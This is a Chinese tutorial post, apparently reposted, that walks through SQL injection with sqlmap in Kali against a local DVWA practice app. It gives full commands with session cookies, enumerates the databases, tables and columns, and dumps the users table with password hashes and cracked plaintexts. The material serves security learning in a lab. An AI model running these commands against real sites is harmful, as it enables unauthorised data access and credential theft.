web安全与防御---3.kali环境下sqlmap的注入

来源:互联网 发布:java onvif 编辑:程序博客网 时间:2024/06/07 05:47

首先在官网下了一个kali linux的vm版本。(不需要安装步骤,直接打开)

     在线下载的方式需要找个代理(共产党万岁!!),也可以选择下个种子文件再下载。

     有个教训。第一次下了一个kali精简版,结果用vm安装后,选择中文全是乱码。。

需要下个vm tools其中又被折磨了,后面在论坛上找到解决方案。----->(http://www.kali.org.cn/thread-21836-1-1.html)

      没有中文输入法。又来了。------>(http://www.kali.org.cn/thread-23975-1-1.html)

分享一下装完后的喜悦,自带sqlmap等许多工具。

     

接下来真正开始:

    1、使用firefox浏览器(安装一个firebug插件)登录http://192.168.204.132/dvwa/login.php页面,使用admin/password

    2、打开firebug工具的cookie面板,将所有cookie复制下来。得到:

           PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2; path=/; domain=192.168.204.132
           security=low; path=/dvwa/; domain=192.168.204.132

    3、打开dvwa的SQL Injection页面,在User ID输入框内输入1,点击submit按钮。从地址栏得到要测试的url:

          http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

    4、从kali打开终端,数据sqlmap,将会有提示文档。

    5、开始测试该url是否存在sql注入漏洞,在终端输入:  

          sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#'  - -cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low'  

得到信息结果:    

web server operating system: Windowsweb application technology: PHP 5.3.29, Apache 2.4.18back-end DBMS: MySQL >= 5.5
    6、开始探测MYSQL中用来存放应用数据的数据库名称,在终端输入:

           sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' --dbs -v 0

得到信息结果:

available databases [5]:[*] dvwa[*] information_schema[*] mysql[*] performance_schema[*] test

    7、得到数据库是dvwa后,开始获取数据库中所存在表,在终端输入:

          sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables

得到信息结果:

Database: dvwa[2 tables]+-----------+| guestbook || users     |+-----------+

    8、得到两张表,获取一下users表的字段,在终端输入:

          sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables -T users --columns

得到信息结果:

Table: users[8 columns]+--------------+-------------+| Column       | Type        |+--------------+-------------+| user         | varchar(15) || avatar       | varchar(70) || failed_login | int(3)      || first_name   | varchar(15) || last_login   | timestamp   || last_name    | varchar(15) || password     | varchar(32) || user_id      | int(6)      |+--------------+-------------+

    9、最后可以吧表数据导出来了,在终端输入:

          sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables -T users --columns --dump

得到信息结果:

Table: users
[5 entries]+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+| user_id | avatar                                           | user    | password                                    | last_name | first_name | last_login          | failed_login |+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+| 1       | http://127.0.0.1/DVWA/hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2017-04-01 00:58:43 | 0            || 2       | http://127.0.0.1/DVWA/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2017-04-01 00:58:43 | 0            || 3       | http://127.0.0.1/DVWA/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2017-04-01 00:58:43 | 0            || 4       | http://127.0.0.1/DVWA/hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2017-04-01 00:58:43 | 0            || 5       | http://127.0.0.1/DVWA/hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2017-04-01 00:58:43 | 0            |+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.204.132/dump/dvwa/users.csv'
并且导出CSV数据到本地!还发现一个惊喜数,据库中的密文密码也给破译了!!


给出sqlmap的一些选项:(sqlmap -h会给出英文的帮助文档)
–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”
-u : 指定目标URL
-b : 获取DBMS banner
–current-db : 获取当前数据库
–current-user:获取当前用户

–string : 当查询可用时用来匹配页面中的字符串
–users : 枚举DBMS用户
–password : 枚举DBMS用户密码hash

–dbs: 枚举DBMS中的数据库

-D : 要枚举的DBMS数据库
–tables     : 枚举DBMS数据库中的数据表

–columns : 枚举DBMS数据库表中的所有列

-T : 要枚举的DBMS数据表

-C: 要枚举的DBMS数据表中的列

–dump : 转储DBMS数据表项


0 0
原创粉丝点击
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 手指被挤了变黑怎么办 榆次买房太原户口怎么办 皮肤又红又黑怎么办 打仙桃晃晃老输怎么办 微信支付忘了摇怎么办 苹果手机微信摇一摇摇不了怎么办 打麻将牌背的时候怎么办 打麻将背的时候怎么办 同城游台球初使化失败怎么办 qq密码改忘了怎么办啊 qq头像显示不出来怎么办 qq的重要数据被清理怎么办 把qq数据删除了怎么办 手机qq头像显示不同怎么办 手机qq图片显示不出来怎么办 微信群聊右上角双人头像没了怎么办 支付宝好友没了怎么办 手机qq好友头像没了怎么办 微信语音变成听筒模式怎么办 微信语音为听筒模式怎么办 微信设置成听筒模式怎么办 微信验证看不全怎么办 qq看视频无法放大怎么办 苹果6功能键坏了怎么办 qq显示不了头像和图片怎么办 关于学校随便更换老师家长怎么办 qq群昵称改不了怎么办 电脑qq群视频进不去怎么办 微信头像没保存怎么办 qq群信息不响怎么办 微信封面换不了怎么办 微信头像没有了怎么办 科二超过5次怎么办 蘑菇街个人中心打不开怎么办 蘑菇街的个人中心打不开怎么办 qq群500人满了怎么办 微信零钱发不出来怎么办 微信零钱发不出去怎么办 微信零钱发不了红包怎么办 当亲戚孤立你该怎么办 陌陌好友找不到了怎么办